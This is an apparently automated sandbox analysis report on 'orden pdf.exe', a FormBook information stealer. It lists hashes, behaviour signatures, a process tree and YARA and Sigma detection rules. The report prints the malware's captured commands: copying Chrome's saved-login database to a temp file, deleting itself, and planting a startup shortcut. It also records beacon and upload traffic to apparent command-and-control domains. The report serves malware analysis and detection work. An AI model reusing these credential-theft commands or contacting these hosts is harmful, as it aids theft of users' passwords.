

Analysis Report orden pdf.exe

Overview

General Information

Sample Name: orden pdf.exe
Analysis ID: 339334
MD5: 4f1ad14256cc9c420d78d69b468bab48
SHA1: 7734beec32b17c6ef0678533cc9634bd2c890c65
SHA256: 1f05b369246b2867a66aba3cacd9da9c2f29c03adc4d45883c91054c35ac3345
Tags: exe


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match


Startup

  • System is w10x64
  • orden pdf.exe (PID: 2224 cmdline: 'C:\Users\user\Desktop\orden pdf.exe' MD5: 4F1AD14256CC9C420D78D69B468BAB48)
    • orden pdf.exe (PID: 4700 cmdline: C:\Users\user\Desktop\orden pdf.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
    • orden pdf.exe (PID: 5476 cmdline: C:\Users\user\Desktop\orden pdf.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 4120 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
          • DeviceCensus.exe.exe (PID: 5652 cmdline: 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe' MD5: 4F1AD14256CC9C420D78D69B468BAB48)
        • systray.exe (PID: 3652 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6180 cmdline: /c del 'C:\Users\user\Desktop\orden pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2412 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cx9l_rq2dula.exe (PID: 5296 cmdline: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
Rule: Methodology_Suspicious_Shortcut_Local_URL
Description: Detects local script usage for .URL persistence
Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
Strings:
  • 0x13:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x94c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9742:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x153d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14ec1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x154d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1564f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa2ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1413c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xafc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a747:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b74a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18059:$sqlite3step: 68 34 1C 7B E1
  • 0x1816c:$sqlite3step: 68 34 1C 7B E1
  • 0x18088:$sqlite3text: 68 38 2A 90 C5
  • 0x181ad:$sqlite3text: 68 38 2A 90 C5
  • 0x1809b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x181c3:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 2.2.orden pdf.exe.400000.1.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 2.2.orden pdf.exe.400000.1.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 2.2.orden pdf.exe.400000.1.raw.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 2.2.orden pdf.exe.400000.1.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 2.2.orden pdf.exe.400000.1.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\orden pdf.exe, ProcessId: 2224, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\systray.exe, ParentImage: C:\Windows\SysWOW64\systray.exe, ParentProcessId: 3652, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 2412

Signature Overview

AV Detection:

Found malware configuration
Source: 2.2.orden pdf.exe.400000.1.raw.unpack | Malware Configuration Extractor: FormBook
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe | ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe | ReversingLabs: Detection: 32%
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe | ReversingLabs: Detection: 32%
Multi AV Scanner detection for submitted file
Source: orden pdf.exe | Virustotal: Detection: 50%
Source: orden pdf.exe | ReversingLabs: Detection: 32%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
Source: 2.2.orden pdf.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.orden pdf.exe.39e0000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: orden pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: orden pdf.exe
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001BF56F FindFirstFileW,FindClose, 0_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 1_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 1_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001BF56F FindFirstFileW,FindClose, 1_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001C1F94
Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 4x nop then pop edi, 2_2_00416D4E
Source: global traffic | HTTP traffic detected: GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1 | Host: www.unbelievabowboutique.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1 | Host: www.bepbosch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1 | Host: www.hydrabadproperties.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: Joe Sandbox View | IP Address: 91.195.240.94
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: SEDO-ASDE
Source: Joe Sandbox View | ASN Name: GOOGLEUS
          Source: global traffic | HTTP traffic detected: POST /n7ak/ HTTP/1.1 | Host: www.bepbosch.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.bepbosch.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.bepbosch.com/n7ak/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
          Source: global traffic | HTTP traffic detected: POST /n7ak/ HTTP/1.1 | Host: www.bepbosch.com | Connection: close | Content-Length: 194340 | Cache-Control: no-cache | Origin: http://www.bepbosch.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.bepbosch.com/n7ak/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
          Source: global traffic | HTTP traffic detected: POST /n7ak/ HTTP/1.1 | Host: www.hydrabadproperties.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.hydrabadproperties.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.hydrabadproperties.com/n7ak/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
          Source: global traffic | HTTP traffic detected: POST /n7ak/ HTTP/1.1 | Host: www.hydrabadproperties.com | Connection: close | Content-Length: 194340 | Cache-Control: no-cache | Origin: http://www.hydrabadproperties.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.hydrabadproperties.com/n7ak/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001C4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_001C4EB5
          Source: global traffic | HTTP traffic detected: GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1 | Host: www.unbelievabowboutique.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1 | Host: www.bepbosch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: unknown | DNS traffic detected: queries for: www.unbelievabowboutique.com
          Source: unknown | HTTP traffic detected: POST /n7ak/ HTTP/1.1 | Host: www.bepbosch.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.bepbosch.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.bepbosch.com/n7ak/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001C6B0C
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001B2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_001B2B37
          Source: orden pdf.exe, 00000000.00000003.250435560.0000000001712000.00000004.00000001.sdmp | Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_001DF7FF
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 1_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_001DF7FF

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:
